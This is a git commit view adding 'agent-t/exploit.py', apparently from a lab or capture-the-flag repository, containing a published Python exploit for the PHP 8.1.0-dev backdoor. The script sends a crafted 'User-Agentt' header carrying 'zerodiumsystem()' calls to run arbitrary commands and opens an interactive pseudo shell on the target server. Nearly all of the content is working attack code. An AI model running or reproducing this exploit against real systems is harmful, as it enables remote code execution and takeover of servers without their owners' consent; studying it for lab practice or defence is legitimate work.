diff options
| author | Raghuram Subramani <raghus2247@gmail.com> | 2022-09-24 01:51:43 -0400 |
|---|---|---|
| committer | Raghuram Subramani <raghus2247@gmail.com> | 2022-09-24 01:51:43 -0400 |
| commit | 14d0504e13c115f18d0397756dee998cd36436ee (patch) | |
| tree | 39d672e494b0dbbd524b20ef8da8daad5feb6351 /agent-t/exploit.py | |
| parent | cf317c77c1a554cce31ee540e10e92a0b0893b7e (diff) | |
add agent-t
Diffstat (limited to 'agent-t/exploit.py')
| -rw-r--r-- | agent-t/exploit.py | 53 |
1 files changed, 53 insertions, 0 deletions
diff --git a/agent-t/exploit.py b/agent-t/exploit.py new file mode 100644 index 0000000..3bd6e9d --- /dev/null +++ b/agent-t/exploit.py @@ -0,0 +1,53 @@ +# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution +# Date: 23 may 2021 +# Exploit Author: flast101 +# Vendor Homepage: https://www.php.net/ +# Software Link: +# - https://hub.docker.com/r/phpdaily/php +# - https://github.com/phpdaily/php +# Version: 8.1.0-dev +# Tested on: Ubuntu 20.04 +# References: +# - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a +# - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md + +""" +Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/ +Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py +Contact: flast101.sec@gmail.com + +An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header. +The following exploit uses the backdoor to provide a pseudo shell ont the host. +""" + +#!/usr/bin/env python3 +import os +import re +import requests + +host = input("Enter the full host url:\n") +request = requests.Session() +response = request.get(host) + +if str(response) == '<Response [200]>': + print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.") + try: + while 1: + cmd = input("$ ") + headers = { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", + "User-Agentt": "zerodiumsystem('" + cmd + "');" + } + response = request.get(host, headers = headers, allow_redirects = False) + current_page = response.text + stdout = current_page.split('<!DOCTYPE html>',1) + text = print(stdout[0]) + except KeyboardInterrupt: + print("Exiting...") + exit() + +else: + print("\r") + print(response) + print("Host is not available, aborting...") + exit()
\ No newline at end of file |